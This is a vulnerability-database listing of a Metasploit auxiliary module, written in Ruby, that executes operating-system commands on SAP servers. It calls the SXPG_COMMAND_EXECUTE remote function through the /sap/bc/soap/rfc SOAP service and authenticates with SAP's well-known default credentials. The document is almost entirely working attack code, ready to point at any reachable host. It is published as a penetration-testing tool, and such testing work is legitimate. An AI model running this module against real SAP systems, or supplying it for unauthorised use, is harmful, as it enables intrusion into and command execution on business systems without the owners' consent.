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SAP SOAP RFC SXPG_COMMAND_EXECUTE

🗓️ 07 Nov 2012 15:06:28Reported by Agnivesh Sathasivam, nmonkeeType 
metasploit
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This module uses the SXPG_COMMAND_EXECUTE Remote Function Call to execute OS commands in the SM69 transaction via /sap/bc/soap/rfc SOAP service

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

##
# This module is based on, inspired by, or is a port of a plugin available in
# the Onapsis Bizploit Opensource ERP Penetration Testing framework -
# http://www.onapsis.com/research-free-solutions.php.
# Mariano Nunez (the author of the Bizploit framework) helped me in my efforts
# in producing the Metasploit modules and was happy to share his knowledge and
# experience - a very cool guy. I'd also like to thank Chris John Riley,
# Ian de Villiers and Joris van de Vis who have Beta tested the modules and
# provided excellent feedback. Some people just seem to enjoy hacking SAP :)
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  def initialize
    super(
      'Name' => 'SAP SOAP RFC SXPG_COMMAND_EXECUTE',
      'Description' => %q{
          This module makes use of the SXPG_COMMAND_EXECUTE Remote Function Call, through
        the use of the /sap/bc/soap/rfc SOAP service to execute OS commands as configured
        in the SM69 transaction.
        },
      'References' =>
        [
          [ 'URL', 'https://labs.f-secure.com/tools/sap-metasploit-modules/' ]
        ],
      'Author' =>
        [
          'Agnivesh Sathasivam',
          'nmonkee'
        ],
      'License' => MSF_LICENSE
    )
    register_options(
      [
        Opt::RPORT(8000),
        OptString.new('CLIENT', [true, 'SAP Client', '001']),
        OptString.new('HttpUsername', [true, 'Username', 'SAP*']),
        OptString.new('HttpPassword', [true, 'Password', '06071992']),
        OptString.new('CMD', [true, 'SM69 command to be executed', 'PING']),
        OptString.new('PARAM', [false, 'Additional parameters for the SM69 command', nil]),
        OptEnum.new('OS', [true, 'SM69 Target OS','ANYOS',['ANYOS', 'UNIX', 'Windows NT', 'AS/400', 'OS/400']])
      ])
  end

  def run_host(ip)
    os = datastore['OS']
    data = '<?xml version="1.0" encoding="utf-8" ?>'
    data << '<env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:env="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">'
    data << '<env:Body>'
    data << '<n1:SXPG_COMMAND_EXECUTE xmlns:n1="urn:sap-com:document:sap:rfc:functions" env:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
    if datastore['PARAM']
      data << '<ADDITIONAL_PARAMETERS>' + datastore['PARAM'] + ' </ADDITIONAL_PARAMETERS>'
    else
      data << '<ADDITIONAL_PARAMETERS> </ADDITIONAL_PARAMETERS>'
    end
    data << '<COMMANDNAME>' + datastore['CMD'] + '</COMMANDNAME>'
    data << '<OPERATINGSYSTEM>' + os + '</OPERATINGSYSTEM>'
    data << '<EXEC_PROTOCOL><item></item></EXEC_PROTOCOL>'
    data << '</n1:SXPG_COMMAND_EXECUTE>'
    data << '</env:Body>'
    data << '</env:Envelope>'
    print_status("[SAP] #{ip}:#{rport} - sending SOAP SXPG_COMMAND_EXECUTE request")
    begin
      res = send_request_cgi({
        'uri' => '/sap/bc/soap/rfc',
        'method' => 'POST',
        'data' => data,
        'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}",
        'ctype' => 'text/xml; charset=UTF-8',
        'encode_params' => false,
        'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']),
        'headers' =>{
          'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
        },
        'vars_get' => {
          'sap-client'    => datastore['CLIENT'],
          'sap-language'  => 'EN'
        }
      })
      if res and res.code != 500 and res.code != 200
        # to do - implement error handlers for each status code, 404, 301, etc.
        print_error("[SAP] #{ip}:#{rport} - something went wrong!")
        return
      elsif res and res.body =~ /faultstring/
        error = res.body.scan(%r{<faultstring>(.*?)</faultstring>}).flatten
        0.upto(error.length-1) do |i|
          print_error("[SAP] #{ip}:#{rport} - error #{error[i]}")
        end
        return
      elsif res
        print_status("[SAP] #{ip}:#{rport} - got response")
        saptbl = Msf::Ui::Console::Table.new(
          Msf::Ui::Console::Table::Style::Default,
            'Header' => "[SAP] SXPG_COMMAND_EXECUTE ",
            'Prefix' => "\n",
            'Postfix' => "\n",
            'Indent'  => 1,
            'Columns' =>["Output",]
            )
        output = res.body.scan(%r{<MESSAGE>([^<]+)</MESSAGE>}).flatten
        for i in 0..output.length-1
          saptbl << [output[i]]
        end
        print(saptbl.to_s)
        return
      else
        print_error("[SAP] #{ip}:#{rport} - Unknown error")
        return
      end
    rescue ::Rex::ConnectionError
      print_error("[SAP] #{ip}:#{rport} - Unable to connect")
      return
    end
  end
end

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